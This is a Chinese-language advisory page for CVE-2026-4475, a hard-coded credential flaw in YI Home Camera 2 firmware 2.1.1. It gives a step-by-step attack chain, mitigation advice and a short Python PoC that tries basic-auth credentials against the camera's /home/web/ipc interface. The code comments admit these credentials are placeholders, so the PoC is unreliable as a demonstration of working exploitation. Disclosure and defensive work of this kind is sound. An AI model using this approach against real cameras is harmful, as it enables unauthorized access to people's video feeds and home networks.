CVE-2026-4475 小蚁家用摄像机硬编码凭证漏洞

漏洞信息

漏洞编号

CVE-2026-4475

漏洞类型

硬编码凭证

CVSS评分

8.8 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Yi Technology YI Home Camera 2

漏洞概述

Yi Technology YI Home Camera 2 固件版本 2.1.1_20171024151200 中存在一处高危安全漏洞。该漏洞源于设备文件 home/web/ipc 中的某个未公开函数包含硬编码的凭证信息。攻击者无需进行用户交互，只需接入同一本地网络，即可利用这些硬编码凭据绕过正常的身份验证机制。成功利用此漏洞可能导致攻击者完全控制设备，造成敏感数据泄露、系统配置被篡改或服务中断。目前厂商尚未对此披露做出响应，风险极高。

技术细节

该漏洞的核心技术问题在于 YI Home Camera 2 的固件开发过程中，开发人员将调试或管理用的账号密码以明文形式硬编码在固件文件 home/web/ipc 中。由于这些凭证是固件的一部分且无法通过常规用户界面修改，任何知晓该凭证的人都可以访问设备。根据 CVSS 3.1 评分向量，该漏洞具有低攻击复杂度，无需用户交互，且攻击范围限定在邻接网络。攻击者通过简单的脚本构建包含硬编码认证信息的 HTTP 请求发送至目标 IP，即可获取设备的最高权限。这直接破坏了机密性、完整性和可用性。鉴于厂商未响应且 PoC 已公开，建议立即采取网络隔离措施。此外，攻击者通常需先接入受害者的本地网络，随后针对特定端口发起攻击，一旦控制设备，可实时监控或作为内网跳板。

攻击链分析

STEP 1

侦察

攻击者扫描本地网络段，识别在线的 Yi Technology YI Home Camera 2 设备。

STEP 2

分析

确认目标设备运行在受影响的固件版本 2.1.1_20171024151200 上，并定位到存在漏洞的 IPC 文件接口。

STEP 3

利用

攻击者构造包含硬编码凭证的 HTTP 请求，发送至目标设备的 /home/web/ipc 接口，绕过正常认证。

STEP 4

控制

成功验证后，攻击者获取设备的高权限访问，可以查看视频流、修改设置或进一步渗透内网。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_ip = "192.168.1.100"  # Replace with the actual IP of the camera
url = f"http://{target_ip}/home/web/ipc"

# Hard-coded credentials extracted from firmware
# Note: These are placeholders based on the vulnerability description.
# Actual credentials would be extracted from the specific firmware version.
HARDCODED_AUTH = ('admin', '12345678') 

def check_vulnerability():
    try:
        print(f"[*] Attempting to connect to {url}...")
        
        # Sending request with hard-coded credentials
        response = requests.get(url, auth=HARDCODED_AUTH, timeout=10)
        
        if response.status_code == 200:
            print("[+] Vulnerability exploited successfully!")
            print("[+] Hard-coded credentials accepted.")
            print(f"[+] Response body: {response.text[:200]}")
        elif response.status_code == 401 or response.status_code == 403:
            print("[-] Authentication failed. Credentials might be incorrect or patched.")
        else:
            print(f"[?] Received unexpected status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    check_vulnerability()

影响范围

Yi Technology YI Home Camera 2 2.1.1_20171024151200

防御指南

临时缓解措施

由于厂商尚未发布补丁，建议立即将该摄像头设备隔离在独立的访客网络中，禁止其访问互联网及其他关键内网资源。同时，严格限制本地网络的接入权限，仅允许可信设备连接。如果可能，应考虑暂时断开设备物理连接，直到厂商提供修复方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4475
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4475
3 Details https://www.cvedetails.com/cve/CVE-2026-4475/
4 VulDB https://vuldb.com/cve/CVE-2026-4475
5 Link https://vuldb.com/?ctiid.351765
6 Link https://vuldb.com/?id.351765
7 Link https://vuldb.com/?submit.772996
8 Link https://vuldb.com/?submit.772996